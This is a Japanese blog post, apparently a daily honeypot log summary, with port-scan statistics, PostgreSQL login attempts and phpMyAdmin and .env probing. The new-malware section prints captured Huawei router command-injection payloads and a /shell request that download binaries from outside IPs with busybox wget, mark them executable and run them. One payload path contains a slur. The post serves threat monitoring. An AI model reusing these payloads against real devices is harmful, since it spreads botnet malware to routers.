【ハニーポット簡易分析】Honeypot簡易分析(307日目:6/20)
また、1つ歳を取ってしまいました。。。。今年も頑張ります!!
◾️Honeytrap
◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>
<ポート検知数(30日平均比)>
| ポート番号 | サービス | 件数 | 件数差(30日平均) |
|---|---|---|---|
| 445 | smb | 4052 | 175 |
| 5432 | PostgreSQL | 3107 | 3097 |
| 23 | telnet | 1696 | 121 |
| 5900 | vnc | 611 | -4490 |
| 3389 | rdp | 339 | 15 |
| 3306 | mysql | 200 | -42 |
| 10134 | 97 | 97 | |
| 2323 | telnet | 85 | -24 |
| 3385 | qnxnetman | 75 | 60 |
| 2222 | unreg-ab2 | 73 | 40 |
PostgreSQLへの通信が増加していました。よく利用しそうなユーザ名を使ったアクセスと思われます・
ペイロード:
...P....user.root.database.postgres.application_name.psql.client_encoding.UTF8..
...Q....user.admin.database.postgres.application_name.psql.client_encoding.UTF8..
...T....user.postgres.database.postgres.application_name.psql.client_encoding.UTF8..
ペイロード:
...P....user.root.database.postgres.application_name.psql.client_encoding.UTF8..
...Q....user.admin.database.postgres.application_name.psql.client_encoding.UTF8..
...T....user.postgres.database.postgres.application_name.psql.client_encoding.UTF8..
<新規マルウェアダウンロード>
| マルウェア | ペイロード |
| 206[.]189[.]170[.]165 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1..Content-Length: 430..Connection: keep-alive..Accept: */*..Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"....<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 206[.]189[.]170[.]165 -l /tmp/vt -r /bins/element.mips; /bin/busybox chmod 777 /tmp/vt;/tmp/vt huawei.mips;/bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>.... |
| http:/\/178[.]33[.]181[.]23/sh | GET /shell?cd%20/tmp;wget%20hxxp:/%5C/178[.]33[.]181[.]23/sh%20-O%20gf;%20chmod%20777%20gf;./gf HTTP/1.1 |
| 174[.]128[.]226[.]101 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1. <?xml version="1.0" ?>. <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">. <s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">. <NewStatusURL>$(/bin/busybox wget -g 174[.]128[.]226[.]101 -l /tmp/elf -r /elf)</NewStatusURL>.<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>.</u:Upgrade>. </s:Body>. </s:Envelope> |
| 206[.]189[.]17[.]158 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1..Content-Length: 430..Connection: keep-alive..Accept: */*..Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"....<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 206[.]189[.]17[.]158 -l /tmp/vt -r /bins/element.mips; /bin/busybox chmod 777 /tmp/vt;/tmp/vt huawei.mips;/bin/busybox iptables -A INPUT -p tcp --destination-port 37215 -j DROP)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>.... |
| 185[.]244[.]25[.]235 | POST /ctrlt/DeviceUpgrade_1 HTTP/1.1..Content-Length: 430..Connection: keep-alive..Accept: */*..Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"....<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185[.]244[.]25.]235 -l /tmp/binary -r /YOURAFAGGOT101/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>.... |
◾️WoWHoneeypot
<国別検知数および検知数>
<検知パス一覧>
| path | target | CVE | reference | count |
| /tmpfs/auto.jpg | IP camera | - | - | 98 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 25 |
| / | - | - | - | 20 |
| hxxp://110.249.212.46/testget | Unauthorized Relay | - | - | 3 |
| /phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /phpmy/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /pma/scripts/setup.php | phpMyAdmin | - | - | 2 |
| /w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 2 |
| /api/.env | .env file | - | - | 1 |
| /app/.env | .env file | - | - | 1 |
| /manager/html | Tomcat | - | - | 1 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /robots.txt | - | - | - | 1 |
| hxxp://112[.]35[.]88[.]28:8088/index.php | Unauthorized Relay | - | - | 1 |
<新規検知パス一覧>
| path | payload | count |
|---|---|---|
| /phpmyadmin/ index.php | HEAD /phpmyadmin/%20index.php HTTP/1.1 | 1 |
| /phpmyadmino/ index.php | HEAD /phpmyadmino/%20index.php HTTP/1.1 | |
| /phpmyadmino/index.php | HEAD /phpmyadmino/index.php HTTP/1.1 | 1 |
| /phpmyadmion/ index.php | HEAD /phpmyadmion/%20index.php HTTP/1.1 | 1 |
| /phpmyadmion/index.php | HEAD /phpmyadmion/index.php HTTP/1.1 | 1 |
| /pmd/ index.php | HEAD /pmd/%20index.php HTTP/1.1 | 1 |
| /pmd/index.php | HEAD /pmd/index.php HTTP/1.1 | 1 |
phpMyadminの調査行為tの通信となります。存在するかどうか確認しているだけなので特に変わった通信ではありません。
<マルウェアダウンロード>
検知なし
以上となります。
